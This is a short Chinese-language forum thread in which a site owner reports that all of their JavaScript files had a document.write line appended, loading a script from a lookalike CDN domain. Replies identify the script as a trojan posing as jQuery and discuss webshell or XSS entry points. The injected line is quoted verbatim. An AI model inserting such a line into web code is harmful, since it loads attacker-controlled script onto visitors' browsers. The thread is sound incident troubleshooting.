document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E"));
把加载的 js 最后全加了这个。
1
QUC062IzY3M1Y6dg 2022 年 10 月 26 日
就是给网页添加了 jquery 库的引入标签,不过这样写的话,整个页面都废了全部被覆盖。
|
3
kenvix 2022 年 10 月 26 日
打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马
|
5
illl 2022 年 10 月 26 日 via iPhone
被 getshell 了吧,网站用的啥框架
|
6
mxT52CRuqR6o5 2022 年 10 月 26 日
那可能性可多了
|
8
r4aAi04Uk2gYWU89 2022 年 10 月 26 日 @jalen 如果博客开了评论,检查下 xss 。不过所有页面都有加的话,估计 webshell 早拿到了
|
9
learningman 2022 年 10 月 26 日 头一回见到 autos 这个顶级域
|
10
wingor2015 2022 年 10 月 26 日
遇到过一次是服务器上的代码被加了
|
11
jalen OP 我看了自己的文件 就 js 被修改过,也没有新增文件。服务器也没被闯入的痕迹。 这攻击点会在哪里?
|
12
hxy100 2022 年 10 月 27 日
这个域名也很有迷惑性,仿知名 CDN 的域名 jsdelivr.com
|
13
MEIerer 2022 年 10 月 27 日
我好久没中过木马了,现在装东西看见内存小的都会往哈勃测一下
|
15
Trient 2022 年 10 月 27 日
|
16
siwi 2022 年 11 月 12 日
找到问题所在了吗? 我也是被挂了这个链接
|